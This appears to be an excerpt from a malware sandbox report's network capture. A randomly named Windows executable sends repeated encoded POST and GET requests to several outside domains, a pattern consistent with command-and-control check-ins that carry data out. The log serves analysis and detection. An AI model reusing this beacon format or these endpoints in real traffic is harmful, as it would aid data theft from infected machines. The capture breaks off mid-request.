                                                                      Dec 10, 2024 15:15:40.188566923 CET | 391 | IN | HTTP/1.1 301 Moved Permanently
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 10 Dec 2024 14:15:39 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 178
                                                                      Connection: close
                                                                      Location: https://www.cstrategy.online/qx5d/
                                                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      4 | 192.168.2.11 | 49716 | 194.76.119.60 | 80 | 5804 | C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Dec 10, 2024 15:15:41.504839897 CET | 362 | OUT | GET /qx5d/?x2q=IyUQrkKyuirfHSYtNcNb8FX1VMdObdd7C0LSkI7uCAGWAT/RC+PuW1l2SNatEGXPklxe1J/nxX2px2UyQ1iP4/fNUbperoympu86OQyU69q5Nwob6N2bh/8=&Gn6D=5fNLN8qhqB3P HTTP/1.1
                                                                      Host: www.cstrategy.online
                                                                      Accept: */*
                                                                      Accept-Language: en-us
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Dec 10, 2024 15:15:42.821444988 CET | 534 | IN | HTTP/1.1 301 Moved Permanently
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 10 Dec 2024 14:15:42 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 178
                                                                      Connection: close
                                                                      Location: https://www.cstrategy.online/qx5d/?x2q=IyUQrkKyuirfHSYtNcNb8FX1VMdObdd7C0LSkI7uCAGWAT/RC+PuW1l2SNatEGXPklxe1J/nxX2px2UyQ1iP4/fNUbperoympu86OQyU69q5Nwob6N2bh/8=&Gn6D=5fNLN8qhqB3P
                                                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      5 | 192.168.2.11 | 49717 | 103.224.182.242 | 80 | 5804 | C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Dec 10, 2024 15:15:49.168200970 CET | 614 | OUT | POST /6ou6/ HTTP/1.1
                                                                      Host: www.madhf.tech
                                                                      Accept: */*
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Origin: http://www.madhf.tech
                                                                      Content-Length: 200
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.madhf.tech/6ou6/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Data Ascii: x2q=bcTWnB08V6+cMyAChHoCete2afKVv/HJBIK1741gegLH/ov8yq9/IgPEX223NS04PXPTK64e0Fq/6xUxWdTB9W7j/NFl2Mhd5IphPEb7Q76/KsskEWAKUOxJLPdgugDwtDNbSnqCm1e6C99JfxmuELLmZoyNndgFTSJ+6xO/VkNop1xVOXuIVShfCodn8vQX+A==
                                                                      Dec 10, 2024 15:15:50.438632011 CET | 871 | IN | HTTP/1.1 200 OK
                                                                      date: Tue, 10 Dec 2024 14:15:50 GMT
                                                                      server: Apache
                                                                      set-cookie: __tad=1733840150.1472258; expires=Fri, 08-Dec-2034 14:15:50 GMT; Max-Age=315360000
                                                                      vary: Accept-Encoding
                                                                      content-encoding: gzip
                                                                      content-length: 576
                                                                      content-type: text/html; charset=UTF-8
                                                                      connection: close


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      6 | 192.168.2.11 | 49718 | 103.224.182.242 | 80 | 5804 | C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Dec 10, 2024 15:15:51.869951010 CET | 634 | OUT | POST /6ou6/ HTTP/1.1
                                                                      Host: www.madhf.tech
                                                                      Accept: */*
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Origin: http://www.madhf.tech
                                                                      Content-Length: 220
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.madhf.tech/6ou6/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Data Ascii: x2q=bcTWnB08V6+cOWECtA8CWtexZfKVkfHVBJ2175w7eVjH66381uJ/NgPEcW2IDy0vPXDxK5ge0EK/6zMxRurC9G7h3tFj7shd5IphPAzRQ7i/LfkkLSULL+xIIPdglAD0tDM2Sizfm3W6C4RJfjCtOLLkGYzjvtJpUyg/iROwf2MPoz8Pe0nfWBpdWO8X1e1elGbGVM+uPa09HrAi9WuoFi8=
                                                                      Dec 10, 2024 15:15:53.097366095 CET | 871 | IN | HTTP/1.1 200 OK
                                                                      date: Tue, 10 Dec 2024 14:15:52 GMT
                                                                      server: Apache
                                                                      set-cookie: __tad=1733840152.4262799; expires=Fri, 08-Dec-2034 14:15:52 GMT; Max-Age=315360000
                                                                      vary: Accept-Encoding
                                                                      content-encoding: gzip
                                                                      content-length: 576
                                                                      content-type: text/html; charset=UTF-8
                                                                      connection: close


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      7 | 192.168.2.11 | 49719 | 103.224.182.242 | 80 | 5804 | C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Dec 10, 2024 15:15:54.526375055 CET | 1647 | OUT | POST /6ou6/ HTTP/1.1
                                                                      Host: www.madhf.tech
                                                                      Accept: */*
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Origin: http://www.madhf.tech
                                                                      Content-Length: 1232
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.madhf.tech/6ou6/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Dec 10, 2024 15:15:55.748228073 CET | 871 | IN | HTTP/1.1 200 OK
                                                                      date: Tue, 10 Dec 2024 14:15:55 GMT
                                                                      server: Apache
                                                                      set-cookie: __tad=1733840155.5395960; expires=Fri, 08-Dec-2034 14:15:55 GMT; Max-Age=315360000
                                                                      vary: Accept-Encoding
                                                                      content-encoding: gzip
                                                                      content-length: 576
                                                                      content-type: text/html; charset=UTF-8
                                                                      connection: close


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      8 | 192.168.2.11 | 49720 | 103.224.182.242 | 80 | 5804 | C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Dec 10, 2024 15:15:57.176817894 CET | 356 | OUT | GET /6ou6/?Gn6D=5fNLN8qhqB3P&x2q=We72k2U8RqyHNx9c0lgrcMajP+7PydPnCau05KQMUjWmq73IzupFdRGddnmXCSRdMUrkGKdQ0AHY8jBIUc/tuAzt5NNM6PB2yOIhAl7/Lb+uHN44LWAXbfY= HTTP/1.1
                                                                      Host: www.madhf.tech
                                                                      Accept: */*
                                                                      Accept-Language: en-us
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Dec 10, 2024 15:15:58.411070108 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                      date: Tue, 10 Dec 2024 14:15:58 GMT
                                                                      server: Apache
                                                                      set-cookie: __tad=1733840158.7457317; expires=Fri, 08-Dec-2034 14:15:58 GMT; Max-Age=315360000
                                                                      vary: Accept-Encoding
                                                                      content-length: 1481
                                                                      content-type: text/html; charset=UTF-8
                                                                      connection: close
                                                                      Data Ascii: <html><head><title>madhf.tech</title><script type="text/javascript" src="/js/fingerprint/iife.min.js"></script><script type="text/javascript">var redirect_link = 'http://www.madhf.tech/6ou6/?Gn6D=5fNLN8qhqB3P&x2q=We72k2U8RqyHNx9c0lgrcMajP+7PydPnCau05KQMUjWmq73IzupFdRGddnmXCSRdMUrkGKdQ0AHY8jBIUc/tuAzt5NNM6PB2yOIhAl7/Lb+uHN44LWAXbfY=&';// Set a timeout of 300 microseconds to execute a redirect if the fingerprint promise fails for some reasonfunction fallbackRedirect() {window.location.replace(redirect_link+'fp=-7');}try {const rdrTimeout = setTimeout(fallbackRedirect, 300);var fpPromise = FingerprintJS.load({monitoring: false});fpPromise.then(fp => fp.get()).then(result => { var fprt = 'fp='+result.visitorId;clearTimeout(rdrTimeout);window.location.replace(redirect_link+fprt);});} catch(err) {fallbackRedirect();}</script><style> body { background:#101c36 } </style></head><body bgcolor="#ffffff" te
                                                                      Dec 10, 2024 15:15:58.411178112 CET | 517 | IN
                                                                      Data Ascii: xt="#000000"><div style='display: none;'><a href='http://www.madhf.tech/6ou6/?Gn6D=5fNLN8qhqB3P&x2q=We72k2U8RqyHNx9c0lgrcMajP+7PydPnCau05KQMUjWmq73IzupFdRGddnmXCSRdMUrkGKdQ0AHY8jBIUc/tuAzt5NNM6PB2yOIhAl7/Lb+uHN44LWAXbfY=&fp=-3'>Click here to


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      9 | 192.168.2.11 | 49721 | 104.21.64.1 | 80 | 5804 | C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Dec 10, 2024 15:16:04.026422977 CET | 626 | OUT | POST /v89f/ HTTP/1.1
                                                                      Host: www.bser101pp.buzz
                                                                      Accept: */*
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Origin: http://www.bser101pp.buzz
                                                                      Content-Length: 200
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.bser101pp.buzz/v89f/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Data Ascii: x2q=iTfEV/Gi0JnQQaER7Xj8i31gQDajEzkh8SHhYEYh/cfQ3Aw744xH6jezg7Ccuw02qR4gT3RNmWUsW7QUx1ZE2Yo5hh3GT3TuUX6gG5fE9qmYHztE4V+dH4ofZqiZg6nzoD/uCqzOP6Q7bBFdukhUK+dWLxV29XPp1lxdpf/vkjmodbSJXDqUZpEZAJ6EMlV95A==
                                                                      Dec 10, 2024 15:16:05.193217039 CET | 972 | IN | HTTP/1.1 404 Not Found
                                                                      Date: Tue, 10 Dec 2024 14:16:05 GMT
                                                                      Content-Type: text/html
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      CF-Cache-Status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1e3k1jGkXHYr2mbcEMjdUKLdym47sePCCdWZsHt2B1U3UDex2h1PFiJQbB7LyYmJIg7Ge2C1JP8%2FemeCBnsMA9v1N7BwQFZrMZ699eNRkAsFjN0YAUUrovZYMLqlk%2BAXk9dRxiI%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8efdd9c6dea04339-EWR
                                                                      Content-Encoding: gzip
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1749&min_rtt=1749&rtt_var=874&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=626&delivery_rate=0&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      10 | 192.168.2.11 | 49722 | 104.21.64.1 | 80 | 5804 | C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Dec 10, 2024 15:16:06.802699089 CET | 646 | OUT | POST /v89f/ HTTP/1.1
                                                                      Host: www.bser101pp.buzz
                                                                      Accept: */*
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Origin: http://www.bser101pp.buzz
                                                                      Content-Length: 220
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.bser101pp.buzz/v89f/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Data Ascii: x2q=iTfEV/Gi0JnQW5sR52j8lX1jfjajOTkl8SDhYFcx+uLQ0hA7i5xH2Dez4LDWwA09qR0STzRNmWAsW5YUwCNH2Io7tB3AOnTuUX6gG5Lu9uKYHDdEqgCccYoceqiZ3qn3oD/ICrvgP5o7bA1duQVLfOdcPxUl+lGS2FMAhODwg3mOcdfTHgjDa6MbUvb0FUw0iNHpt0CgbuMQ4gL2fgW8PhA=
                                                                      Dec 10, 2024 15:16:07.990765095 CET | 972 | IN | HTTP/1.1 404 Not Found
                                                                      Date: Tue, 10 Dec 2024 14:16:07 GMT
                                                                      Content-Type: text/html
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      CF-Cache-Status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aYQ7OLcAqachO2eLg4OMhNo8wSHrXFI%2BSE5ShEEY8xNNWoVq8jk4x%2Fc9EzmvpbS5Xz6a8xylG9u4O1TYcMeBHdB9wPDnWkrfkse3NuASIUW7U1MgAbmAquEDaOQxab3eb9bu4YE%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8efdd9d83fdf7277-EWR
                                                                      Content-Encoding: gzip
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1954&min_rtt=1954&rtt_var=977&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=646&delivery_rate=0&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      11 | 192.168.2.11 | 49723 | 104.21.64.1 | 80 | 5804 | C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Dec 10, 2024 15:16:09.491715908 CET | 1659 | OUT | POST /v89f/ HTTP/1.1
                                                                      Host: www.bser101pp.buzz
                                                                      Accept: */*
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Origin: http://www.bser101pp.buzz
                                                                      Content-Length: 1232
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.bser101pp.buzz/v89f/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Dec 10, 2024 15:16:10.623449087 CET | 973 | IN | HTTP/1.1 404 Not Found
                                                                      Date: Tue, 10 Dec 2024 14:16:10 GMT
                                                                      Content-Type: text/html
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      CF-Cache-Status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LiloxfpW4ofiRgL9dZ112j%2FhxE0aGmEmOsDmQ8dzJrFpTKtzrtkFk3VdY92kv0%2Bt6w9Bi9heaMVTQYNh5N9XESqEO909xY3RGxN8GmQfdM1cEH7pnohM3lOfSbFUMyO988V09ak%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8efdd9e8ee914339-EWR
                                                                      Content-Encoding: gzip
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1683&min_rtt=1683&rtt_var=841&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1659&delivery_rate=0&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      12 | 192.168.2.11 | 49724 | 104.21.64.1 | 80 | 5804 | C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Dec 10, 2024 15:16:12.375063896 CET | 360 | OUT | GET /v89f/?x2q=vR3kWP+v98PFeIQX6HbJh3lQDWTjSRYryWjHUGMo4+T5xi8TnNV+jgD2+4ag3QdSrCwOZVBfu0hve5I79B9khdU1gh7QaWeiWgu/JIX+7JexMxtriwWCLY0=&Gn6D=5fNLN8qhqB3P HTTP/1.1
                                                                      Host: www.bser101pp.buzz
                                                                      Accept: */*
                                                                      Accept-Language: en-us
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Dec 10, 2024 15:16:13.456697941 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                      Date: Tue, 10 Dec 2024 14:16:13 GMT
                                                                      Content-Type: text/html
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      CF-Cache-Status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mjJesKHa8E3doiFRZ2guS%2ByCTAbJxKN9hZsC29m9A14i4gCTlLv%2BCmV03c3QdUGbEferlbX8lvA48TKrsvFN0QP0by876%2Fi3kPxLDOvDmYNOZ7G8TXB6qHk5J6BRLCEKzYNSnW4%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8efdd9fa8ae27277-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2022&min_rtt=2022&rtt_var=1011&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=360&delivery_rate=0&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                      Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome fr
                                                                      Dec 10, 2024 15:16:13.456813097 CET | 97 | IN
                                                                      Data Ascii: iendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      13 | 192.168.2.11 | 49725 | 3.33.130.190 | 80 | 5804 | C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Dec 10, 2024 15:16:19.377182961 CET | 647 | OUT | POST /8m07/ HTTP/1.1
                                                                      Host: www.goldstarfootwear.shop
                                                                      Accept: */*
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Origin: http://www.goldstarfootwear.shop
                                                                      Content-Length: 200
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.goldstarfootwear.shop/8m07/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Data Ascii: x2q=7fvor6a+xd+5pjFNxDPsvq/Ttn/vqXRdrk3RPKNIXslDoplgZs6UYD5jl1Z1QPc+zwZM874ARwvwtMMHTr/aQIPm8bVlZ11NE+3MC3QMzDfkEZeWDwu6bT6L5I0N6jlfhUhobCt2xg2gOyXlVtGobRHM0OLylQA/j8wDKrujFMyhAnW754RJZwm309mnwEsQdA==
                                                                      Dec 10, 2024 15:16:20.465555906 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                      content-length: 0
                                                                      connection: close


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      14 | 192.168.2.11 | 49726 | 3.33.130.190 | 80 | 5804 | C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Dec 10, 2024 15:16:22.046566010 CET | 667 | OUT | POST /8m07/ HTTP/1.1
                                                                      Host: www.goldstarfootwear.shop
                                                                      Accept: */*
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Origin: http://www.goldstarfootwear.shop
                                                                      Content-Length: 220
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.goldstarfootwear.shop/8m07/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Data Ascii: x2q=7fvor6a+xd+5vDVNzk7s76/cxX/vj3RBrk7RPOUTXeRDoIVgfd6UIT5jtVZwUPcDzwdy86EARwrwtN8HT4HVQYPk07VnWV1NE+3MC3FpzDHkEpuWCVO5Wz6KoI0NpzlThUgNbDwjxm6gOznlMcGrVhHC3+KduFhokPEXUoqrB4GaIBbhpbYeaju1gbHX51JZGL40Zwh6MAjaHRIEJTFq9yc=
                                                                      Dec 10, 2024 15:16:23.122889042 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                      content-length: 0
                                                                      connection: close


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      15 | 192.168.2.11 | 49727 | 3.33.130.190 | 80 | 5804 | C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Dec 10, 2024 15:16:24.714791059 CET | 1680 | OUT | POST /8m07/ HTTP/1.1
                                                                      Host: www.goldstarfootwear.shop
                                                                      Accept: */*
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Origin: http://www.goldstarfootwear.shop
                                                                      Content-Length: 1232
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.goldstarfootwear.shop/8m07/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Dec 10, 2024 15:16:25.795277119 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                      content-length: 0
                                                                      connection: close


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      16 | 192.168.2.11 | 49728 | 3.33.130.190 | 80 | 5804 | C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Dec 10, 2024 15:16:27.381664038 CET | 367 | OUT | GET /8m07/?x2q=2dHIoPS/8uSmn0UQwBXvkZ7FsiKx9Udv3lXpG+Z7ZfR3/r1MA6yfaSEuuX1gcPtu0HplxKUHBw+SrOQKMJrrHP/N37p6QmtlKoXALFEyxzy3Eq+MEUnkUgU=&Gn6D=5fNLN8qhqB3P HTTP/1.1
                                                                      Host: www.goldstarfootwear.shop
                                                                      Accept: */*
                                                                      Accept-Language: en-us
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Dec 10, 2024 15:16:29.308307886 CET | 378 | IN | HTTP/1.1 200 OK
                                                                      content-type: text/html
                                                                      date: Tue, 10 Dec 2024 14:16:29 GMT
                                                                      content-length: 257
                                                                      connection: close
                                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?x2q=2dHIoPS/8uSmn0UQwBXvkZ7FsiKx9Udv3lXpG+Z7ZfR3/r1MA6yfaSEuuX1gcPtu0HplxKUHBw+SrOQKMJrrHP/N37p6QmtlKoXALFEyxzy3Eq+MEUnkUgU=&Gn6D=5fNLN8qhqB3P"}</script></head></html>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      17 | 192.168.2.11 | 49729 | 161.97.142.144 | 80 | 5804 | C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Dec 10, 2024 15:16:34.951370001 CET | 623 | OUT | POST /6m2n/ HTTP/1.1
                                                                      Host: www.070002018.xyz
                                                                      Accept: */*
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Origin: http://www.070002018.xyz
                                                                      Content-Length: 200
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.070002018.xyz/6m2n/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Dec 10, 2024 15:16:36.180996895 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                      Server: nginx
                                                                      Date: Tue, 10 Dec 2024 14:16:35 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Vary: Accept-Encoding
                                                                      ETag: W/"66cce1df-b96"
                                                                      Content-Encoding: gzip
                                                                      Dec 10, 2024 15:16:36.181082964 CET | 370 | IN


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      18 | 192.168.2.11 | 49730 | 161.97.142.144 | 80 | 5804 | C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Dec 10, 2024 15:16:37.626610994 CET | 643 | OUT | POST /6m2n/ HTTP/1.1
                                                                      Host: www.070002018.xyz
                                                                      Accept: */*
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Origin: http://www.070002018.xyz
                                                                      Content-Length: 220
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.070002018.xyz/6m2n/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Dec 10, 2024 15:16:38.850297928 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                      Server: nginx
                                                                      Date: Tue, 10 Dec 2024 14:16:38 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Vary: Accept-Encoding
                                                                      ETag: W/"66cce1df-b96"
                                                                      Content-Encoding: gzip
                                                                      Dec 10, 2024 15:16:38.850348949 CET | 370 | IN


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      19 | 192.168.2.11 | 49731 | 161.97.142.144 | 80 | 5804 | C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Dec 10, 2024 15:16:40.317591906 CET | 1656 | OUT | POST /6m2n/ HTTP/1.1
                                                                      Host: www.070002018.xyz
                                                                      Accept: */*
